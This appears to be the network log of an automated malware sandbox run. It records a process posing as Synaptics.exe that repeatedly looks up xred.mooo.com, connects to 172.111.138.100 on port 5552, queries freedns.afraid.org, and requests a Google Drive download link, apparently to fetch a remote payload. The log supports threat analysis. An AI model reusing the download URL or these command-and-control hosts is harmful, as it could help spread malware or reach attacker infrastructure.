                                                                                                                    Dec 30, 2024 11:26:10.521197081 CET44349946142.250.186.97192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:10.521254063 CET49946443192.168.2.9142.250.186.97
                                                                                                                    Dec 30, 2024 11:26:10.527066946 CET49946443192.168.2.9142.250.186.97
                                                                                                                    Dec 30, 2024 11:26:10.527091026 CET44349946142.250.186.97192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:10.536010981 CET44349945142.250.185.78192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:10.536266088 CET49945443192.168.2.9142.250.185.78
                                                                                                                    Dec 30, 2024 11:26:10.536283970 CET44349945142.250.185.78192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:10.536362886 CET49945443192.168.2.9142.250.185.78
                                                                                                                    Dec 30, 2024 11:26:10.536474943 CET49945443192.168.2.9142.250.185.78
                                                                                                                    Dec 30, 2024 11:26:10.536521912 CET44349945142.250.185.78192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:10.536607027 CET49945443192.168.2.9142.250.185.78
                                                                                                                    Dec 30, 2024 11:26:10.537149906 CET49951443192.168.2.9142.250.186.97
                                                                                                                    Dec 30, 2024 11:26:10.537188053 CET44349951142.250.186.97192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:10.537287951 CET49951443192.168.2.9142.250.186.97
                                                                                                                    Dec 30, 2024 11:26:10.537576914 CET49952443192.168.2.9142.250.185.78
                                                                                                                    Dec 30, 2024 11:26:10.537625074 CET44349952142.250.185.78192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:10.537847042 CET49952443192.168.2.9142.250.185.78
                                                                                                                    Dec 30, 2024 11:26:10.538285971 CET49951443192.168.2.9142.250.186.97
                                                                                                                    Dec 30, 2024 11:26:10.538300991 CET44349951142.250.186.97192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:10.538502932 CET49952443192.168.2.9142.250.185.78
                                                                                                                    Dec 30, 2024 11:26:10.538511992 CET44349952142.250.185.78192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:11.056174040 CET44349950142.250.186.97192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:11.056391001 CET49950443192.168.2.9142.250.186.97
                                                                                                                    Dec 30, 2024 11:26:11.056421995 CET44349949142.250.185.78192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:11.056482077 CET49949443192.168.2.9142.250.185.78
                                                                                                                    Dec 30, 2024 11:26:11.057185888 CET44349949142.250.185.78192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:11.057218075 CET49950443192.168.2.9142.250.186.97
                                                                                                                    Dec 30, 2024 11:26:11.057231903 CET44349950142.250.186.97192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:11.057261944 CET49949443192.168.2.9142.250.185.78
                                                                                                                    Dec 30, 2024 11:26:11.058988094 CET49949443192.168.2.9142.250.185.78
                                                                                                                    Dec 30, 2024 11:26:11.058996916 CET44349949142.250.185.78192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:11.059233904 CET44349949142.250.185.78192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:11.059282064 CET49949443192.168.2.9142.250.185.78
                                                                                                                    Dec 30, 2024 11:26:11.059489012 CET49950443192.168.2.9142.250.186.97
                                                                                                                    Dec 30, 2024 11:26:11.059495926 CET44349950142.250.186.97192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:11.059858084 CET49949443192.168.2.9142.250.185.78
                                                                                                                    Dec 30, 2024 11:26:11.103351116 CET44349949142.250.185.78192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:11.147247076 CET44349951142.250.186.97192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:11.147473097 CET49951443192.168.2.9142.250.186.97
                                                                                                                    Dec 30, 2024 11:26:11.151207924 CET49951443192.168.2.9142.250.186.97
                                                                                                                    Dec 30, 2024 11:26:11.151221991 CET44349951142.250.186.97192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:11.151365995 CET49951443192.168.2.9142.250.186.97
                                                                                                                    Dec 30, 2024 11:26:11.151371956 CET44349951142.250.186.97192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:11.253387928 CET44349952142.250.185.78192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:11.253473997 CET49952443192.168.2.9142.250.185.78
                                                                                                                    Dec 30, 2024 11:26:11.254122972 CET44349952142.250.185.78192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:11.254168034 CET49952443192.168.2.9142.250.185.78
                                                                                                                    Dec 30, 2024 11:26:11.264144897 CET49952443192.168.2.9142.250.185.78
                                                                                                                    Dec 30, 2024 11:26:11.264168024 CET44349952142.250.185.78192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:11.264477015 CET44349952142.250.185.78192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:11.264533997 CET49952443192.168.2.9142.250.185.78
                                                                                                                    Dec 30, 2024 11:26:11.264960051 CET49952443192.168.2.9142.250.185.78
                                                                                                                    Dec 30, 2024 11:26:11.311327934 CET44349952142.250.185.78192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:11.482194901 CET44349950142.250.186.97192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:11.482239008 CET44349950142.250.186.97192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:11.482289076 CET49950443192.168.2.9142.250.186.97
                                                                                                                    Dec 30, 2024 11:26:11.482332945 CET44349950142.250.186.97192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:11.482347965 CET49950443192.168.2.9142.250.186.97
                                                                                                                    Dec 30, 2024 11:26:11.482408047 CET49950443192.168.2.9142.250.186.97
                                                                                                                    Dec 30, 2024 11:26:11.483174086 CET49950443192.168.2.9142.250.186.97
                                                                                                                    Dec 30, 2024 11:26:11.483223915 CET44349950142.250.186.97192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:11.483294010 CET49950443192.168.2.9142.250.186.97
                                                                                                                    Dec 30, 2024 11:26:11.517433882 CET44349949142.250.185.78192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:11.517541885 CET49949443192.168.2.9142.250.185.78
                                                                                                                    Dec 30, 2024 11:26:11.517568111 CET44349949142.250.185.78192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:11.517652035 CET49949443192.168.2.9142.250.185.78
                                                                                                                    Dec 30, 2024 11:26:11.517652035 CET49949443192.168.2.9142.250.185.78
                                                                                                                    Dec 30, 2024 11:26:11.517698050 CET44349949142.250.185.78192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:11.517812014 CET49949443192.168.2.9142.250.185.78
                                                                                                                    Dec 30, 2024 11:26:11.518228054 CET49955443192.168.2.9142.250.185.78
                                                                                                                    Dec 30, 2024 11:26:11.518280029 CET44349955142.250.185.78192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:11.518407106 CET49956443192.168.2.9142.250.186.97
                                                                                                                    Dec 30, 2024 11:26:11.518445969 CET44349956142.250.186.97192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:11.518469095 CET49955443192.168.2.9142.250.185.78
                                                                                                                    Dec 30, 2024 11:26:11.518507957 CET49956443192.168.2.9142.250.186.97
                                                                                                                    Dec 30, 2024 11:26:11.518861055 CET49955443192.168.2.9142.250.185.78
                                                                                                                    Dec 30, 2024 11:26:11.518876076 CET44349955142.250.185.78192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:11.519085884 CET49956443192.168.2.9142.250.186.97
                                                                                                                    Dec 30, 2024 11:26:11.519103050 CET44349956142.250.186.97192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:11.634331942 CET44349951142.250.186.97192.168.2.9
                                                                                                                    Dec 30, 2024 11:27:06.808847904 CET555249974172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:27:06.812279940 CET499745552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:27:07.882466078 CET499745552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:27:07.887404919 CET555249974172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:27:14.044091940 CET499755552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:27:14.049053907 CET555249975172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:27:14.049134016 CET499755552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:27:14.049428940 CET499755552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:27:14.054168940 CET555249975172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:27:30.174057007 CET555249975172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:27:30.174125910 CET499755552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:27:30.182900906 CET499755552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:27:30.187772036 CET555249975172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:27:30.208709955 CET499785552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:27:30.213586092 CET555249978172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:27:30.213727951 CET499785552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:27:30.214087963 CET499785552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:27:30.218806028 CET555249978172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:27:44.084431887 CET555249978172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:27:44.084629059 CET499785552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:27:44.141242027 CET499785552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:27:44.147102118 CET555249978172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:27:44.161832094 CET499795552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:27:44.166757107 CET555249979172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:27:44.166850090 CET499795552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:27:44.167160034 CET499795552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:27:44.171968937 CET555249979172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:27:46.337516069 CET555249979172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:27:46.337620020 CET499795552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:27:46.356514931 CET499795552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:27:46.361574888 CET555249979172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:27:53.224034071 CET499805552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:27:53.229036093 CET555249980172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:27:53.229263067 CET499805552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:27:53.229379892 CET499805552192.168.2.9172.111.138.100
                                                                                                                    Dec 30, 2024 11:27:53.234188080 CET555249980172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:27:53.498584032 CET4971780192.168.2.969.42.215.252
                                                                                                                    Dec 30, 2024 11:27:53.533016920 CET49960443192.168.2.9142.250.186.97
                                                                                                                    Dec 30, 2024 11:27:53.533610106 CET49959443192.168.2.9142.250.185.78
                                                                                                                    Dec 30, 2024 11:27:53.533734083 CET49966443192.168.2.9142.250.185.78
                                                                                                                    Dec 30, 2024 11:27:53.533813000 CET49972443192.168.2.9142.250.186.97
                                                                                                                    Dec 30, 2024 11:27:55.369499922 CET555249980172.111.138.100192.168.2.9
                                                                                                                    Dec 30, 2024 11:27:55.369551897 CET499805552192.168.2.9172.111.138.100
                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Dec 30, 2024 11:25:22.997725964 CET4969553192.168.2.91.1.1.1
                                                                                                                    Dec 30, 2024 11:25:23.004785061 CET53496951.1.1.1192.168.2.9
                                                                                                                    Dec 30, 2024 11:25:24.780280113 CET6495253192.168.2.91.1.1.1
                                                                                                                    Dec 30, 2024 11:25:24.787516117 CET53649521.1.1.1192.168.2.9
                                                                                                                    Dec 30, 2024 11:25:24.815880060 CET5893953192.168.2.91.1.1.1
                                                                                                                    Dec 30, 2024 11:25:24.824109077 CET53589391.1.1.1192.168.2.9
                                                                                                                    Dec 30, 2024 11:25:25.108273983 CET6150153192.168.2.91.1.1.1
                                                                                                                    Dec 30, 2024 11:25:25.115520000 CET53615011.1.1.1192.168.2.9
                                                                                                                    Dec 30, 2024 11:25:31.620666027 CET5579753192.168.2.91.1.1.1
                                                                                                                    Dec 30, 2024 11:25:31.627922058 CET53557971.1.1.1192.168.2.9
                                                                                                                    Dec 30, 2024 11:25:36.459898949 CET5333953192.168.2.91.1.1.1
                                                                                                                    Dec 30, 2024 11:25:36.467302084 CET53533391.1.1.1192.168.2.9
                                                                                                                    Dec 30, 2024 11:25:42.443902016 CET6335153192.168.2.91.1.1.1
                                                                                                                    Dec 30, 2024 11:25:42.451451063 CET53633511.1.1.1192.168.2.9
                                                                                                                    Dec 30, 2024 11:25:47.127808094 CET6184053192.168.2.91.1.1.1
                                                                                                                    Dec 30, 2024 11:25:47.135489941 CET53618401.1.1.1192.168.2.9
                                                                                                                    Dec 30, 2024 11:25:52.965065956 CET6114253192.168.2.91.1.1.1
                                                                                                                    Dec 30, 2024 11:25:52.972135067 CET53611421.1.1.1192.168.2.9
                                                                                                                    Dec 30, 2024 11:25:59.928705931 CET6011053192.168.2.91.1.1.1
                                                                                                                    Dec 30, 2024 11:25:59.936491013 CET53601101.1.1.1192.168.2.9
                                                                                                                    Dec 30, 2024 11:26:06.974661112 CET5002453192.168.2.91.1.1.1
                                                                                                                    Dec 30, 2024 11:26:06.982017994 CET53500241.1.1.1192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 30, 2024 11:25:22.997725964 CET | 192.168.2.9 | 1.1.1.1 | 0x55ad | Standard query (0) | docs.google.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:25:24.780280113 CET | 192.168.2.9 | 1.1.1.1 | 0xe53d | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:25:24.815880060 CET | 192.168.2.9 | 1.1.1.1 | 0x18a2 | Standard query (0) | freedns.afraid.org | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:25:25.108273983 CET | 192.168.2.9 | 1.1.1.1 | 0x1d03 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:25:31.620666027 CET | 192.168.2.9 | 1.1.1.1 | 0x9009 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:25:36.459898949 CET | 192.168.2.9 | 1.1.1.1 | 0x6966 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:25:42.443902016 CET | 192.168.2.9 | 1.1.1.1 | 0x5346 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:25:47.127808094 CET | 192.168.2.9 | 1.1.1.1 | 0x3ad0 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:25:52.965065956 CET | 192.168.2.9 | 1.1.1.1 | 0xebc8 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:25:59.928705931 CET | 192.168.2.9 | 1.1.1.1 | 0x50bc | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:26:06.974661112 CET | 192.168.2.9 | 1.1.1.1 | 0x1a7e | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 30, 2024 11:25:23.004785061 CET | 1.1.1.1 | 192.168.2.9 | 0x55ad | No error (0) | docs.google.com | | 142.250.185.78 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:25:24.787516117 CET | 1.1.1.1 | 192.168.2.9 | 0xe53d | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:25:24.824109077 CET | 1.1.1.1 | 192.168.2.9 | 0x18a2 | No error (0) | freedns.afraid.org | | 69.42.215.252 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:25:25.115520000 CET | 1.1.1.1 | 192.168.2.9 | 0x1d03 | No error (0) | drive.usercontent.google.com | | 142.250.186.97 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:25:31.627922058 CET | 1.1.1.1 | 192.168.2.9 | 0x9009 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:25:36.467302084 CET | 1.1.1.1 | 192.168.2.9 | 0x6966 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:25:42.451451063 CET | 1.1.1.1 | 192.168.2.9 | 0x5346 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:25:47.135489941 CET | 1.1.1.1 | 192.168.2.9 | 0x3ad0 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:25:52.972135067 CET | 1.1.1.1 | 192.168.2.9 | 0xebc8 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:25:59.936491013 CET | 1.1.1.1 | 192.168.2.9 | 0x50bc | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:26:06.982017994 CET | 1.1.1.1 | 192.168.2.9 | 0x1a7e | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:26:24.603271961 CET | 1.1.1.1 | 192.168.2.9 | 0x4b6a | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | azurefd-t-fb-prod.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 30, 2024 11:26:24.603271961 CET | 1.1.1.1 | 192.168.2.9 | 0x4b6a | No error (0) | dual.s-part-0017.t-0009.fb-t-msedge.net | s-part-0017.t-0009.fb-t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 30, 2024 11:26:24.603271961 CET | 1.1.1.1 | 192.168.2.9 | 0x4b6a | No error (0) | s-part-0017.t-0009.fb-t-msedge.net | | 13.107.253.45 | A (IP address) | IN (0x0001) | false
                                                                                                                    • docs.google.com
                                                                                                                    • drive.usercontent.google.com
                                                                                                                    • freedns.afraid.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49717 | 69.42.215.252 | 80 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
Dec 30, 2024 11:25:24.830220938 CET | 154 | OUT | GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                                                                                    User-Agent: MyApp
                                                                                                                    Host: freedns.afraid.org
                                                                                                                    Cache-Control: no-cache
Dec 30, 2024 11:25:25.431468964 CET | 243 | IN | HTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:25 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: keep-alive
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    X-Cache: MISS
                                                                                                                    Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 1fERROR: Could not authenticate.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49713 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:24 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
2024-12-30 10:25:24 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:24 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-WKosOfo0e41_6oaxs0jVBA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49712 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:24 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
2024-12-30 10:25:24 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:24 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-XimWgbbBkx2Zx4HNiD_tMg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    2 | 192.168.2.9 | 49719 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:25 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-12-30 10:25:26 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:25 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-aZa8YgIuvbJ6DJzq69TQFQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    3 | 192.168.2.9 | 49718 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:25 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-12-30 10:25:26 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:25 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-MslHnAuCR7u2Vn7NNOBS6Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    4 | 192.168.2.9 | 49721 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
